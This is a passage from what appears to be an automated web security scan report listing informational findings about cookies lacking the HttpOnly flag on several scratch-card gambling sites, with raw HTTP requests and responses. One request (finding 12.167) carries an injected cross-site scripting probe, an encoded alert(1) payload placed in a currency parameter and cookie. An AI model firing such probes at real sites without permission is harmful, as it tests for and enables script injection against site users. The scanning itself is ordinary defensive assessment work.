Date: Mon, 16 May 2011 12:38:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.152. http://primescratchcards.com/images/aboutus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.153. http://primescratchcards.com/images/affiliates.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.154. http://primescratchcards.com/images/contactus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/contactus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/contactus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.155. http://primescratchcards.com/images/fairplay.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/fairplay.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fairplay.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:02 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.156. http://primescratchcards.com/images/help.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/help.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/help.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.157. http://primescratchcards.com/images/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/index.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:00 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.158. http://primescratchcards.com/images/media.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/media.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/media.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:18 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.159. http://primescratchcards.com/images/playersclub.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/playersclub.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/playersclub.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.160. http://primescratchcards.com/images/promotions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:04 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.161. http://primescratchcards.com/images/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.162. http://primescratchcards.com/images/underage.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.163. http://pt.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.164. http://pt.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=noicjv45pm3igo55xdqqujbl; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:01:31 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: UniqueVisitorID=582C4C70EA7E56EDD6D14F40E161EA4F; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:01:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.165. http://pt.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w4te23y1zi5nuxrpfwibpqbn; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:36 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: UniqueVisitorID=4B1905225FA4B80745F583B7A7A6774D; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:36 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.166. http://pt.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: pt.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ezix3mzcpqnyv3il13wvcqv; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=BC872EF8D517737D5602A1CEA609E353&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=BC872EF8D517737D5602A1CEA609E353; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.167. http://scratch.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:59:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:01 GMT; path=/
Content-Type: text/html
Content-Length: 11133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.168. http://scratch.co.uk/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:41 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:41 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 12833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.169. http://scratch.co.uk/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /contact/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:46 GMT; path=/
